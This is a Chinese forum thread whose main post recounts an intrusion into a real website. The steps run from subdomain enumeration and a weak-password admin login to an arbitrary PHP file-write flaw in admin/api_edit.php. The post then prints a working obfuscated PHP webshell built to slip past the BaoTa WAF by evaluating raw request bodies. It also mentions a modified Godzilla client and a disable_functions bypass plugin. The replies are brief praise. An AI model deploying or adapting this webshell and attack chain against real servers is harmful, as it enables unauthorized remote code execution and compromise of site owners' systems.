返回列表 发新帖

绕过宝塔waf破解 getshell

[复制链接]

14

主题

71

回帖

715

积分

初中生

Rank: 3Rank: 3

金币
527
好评
12
信誉
110
发表于 2026-4-15 13:38:30 | 显示全部楼层 | 阅读模式  来自 中国
前期打点
拿到域名进行子域名收集使用subfinder和各大资产测绘平台
进行子域名收集
tscan进行测活
最后发现一个脆弱点能弱口令进入口台
寻找源码
在某源码站发现此源码
代码审计后台漏洞发现
文件路径:admin/api_edit.php
核心漏洞代码1
接收用户输入的PHP代码
直接从 `$_POST['local_code']` 获取用户输入的PHP代码
没有对代码内容进行任何安全检查或过滤
没有验证代码是否包含危险函数(eval、system、exec等)
仅做了简单的 `<?php` 标签处理,没有安全意义
漏洞核心代码2

问题分析:
使用 `file_put_contents()` 直接将用户提交的代码写入PHP文件
文件路径为 `../API/[endpoint].php`,可被直接访问执行
写入的文件具有完整的PHP执行权限
文件路径构造

虽然对endpoint进行了URL编码,但这不能防止代码执行
创建的PHP文件可以通过Web直接访问
文件权限为0755,可被执行


成功定位到漏洞点
绕过宝塔waf phpwebshell
但是好景不长在我写入webshell的时候遭遇拦截
通过朋友给的拦截规则进行绕过
根据拦截规则bypass出如下代码
  1. class User {
  2.     public static function getpublicMethod() {
  3.         return 'publicMethod';
  4.     }
  5.     public static function publicMethod($args) {
  6.         $key = 'args';
  7.         $pass_decode = $$key;
  8.         return @eval($pass_decode);
  9.     }
  10. }

  11. $classloader = 'User';
  12. $method = $classloader::getpublicMethod();

  13. $aes_decode = <<<'EOF'
  14. register_shutdown_function(function(){
  15.     $data=file_get_contents("php://input");
  16.     if(!empty($data)) eval($data);
  17. });
  18. EOF;

  19. User::$method($aes_decode);
复制代码
成功代码执行 但是无法执行命令
查看disable 发现高危的命令执行函数都被禁用了
上二开的哥斯拉一般修改过流量特征

最后使用插件 bypass disable


















本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有账号?立即注册

x
已有2人评分好评 金币 理由
悸D浮生 + 1 + 1
青春向上 + 1 + 1 感谢分享。

查看全部评分 总评分:好评 +2  金币 +2 

回复

使用道具 举报

118

主题

2441

回帖

6641

积分

硕士生

Rank: 6Rank: 6

金币
316
好评
53
信誉
25

MT论坛最佳新人MT论坛新人考神MT论坛帅哥

发表于 2026-4-15 14:34:18 来自手机  | 显示全部楼层  来自 河南
挽尊
回复

使用道具 举报

0

主题

6415

回帖

1万

积分

博士生

Rank: 7Rank: 7Rank: 7

金币
835
好评
1
信誉
107
发表于 2026-4-15 15:04:50 来自手机  | 显示全部楼层  来自 广东
学习学习
回复

使用道具 举报

4

主题

739

回帖

2676

积分

大学生

Rank: 5Rank: 5

金币
1593
好评
0
信誉
100

考神

发表于 2026-4-15 16:26:29 | 显示全部楼层  来自 广东
牛逼
回复

使用道具 举报

6

主题

2144

回帖

5698

积分

硕士生

Rank: 6Rank: 6

金币
3400
好评
0
信誉
100
发表于 2026-4-15 16:34:22 来自手机  | 显示全部楼层  来自 陕西
学习学习
回复

使用道具 举报

1

主题

1万

回帖

3万

积分

博士后

Rank: 8Rank: 8

金币
9013
好评
4
信誉
1303

考神MT论坛帅哥MT论坛新人

发表于 2026-4-30 13:00:53 来自手机  | 显示全部楼层  来自 广西
看看
回复

使用道具 举报

0

主题

479

回帖

1626

积分

高中生

Rank: 4

金币
1479
好评
0
信誉
100
发表于 2026-5-3 22:40:48 来自手机  | 显示全部楼层  来自 北京
多发爱看
回复

使用道具 举报

30

主题

494

回帖

2356

积分

大学生

Rank: 5Rank: 5

金币
1215
好评
5
信誉
115

考神MT论坛帅哥MT论坛新人MT论坛最佳新人

发表于 2026-6-15 15:04:19 来自手机  | 显示全部楼层  来自 江苏
害怕,我宝塔被入侵过两次
回复

使用道具 举报

发表回复

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表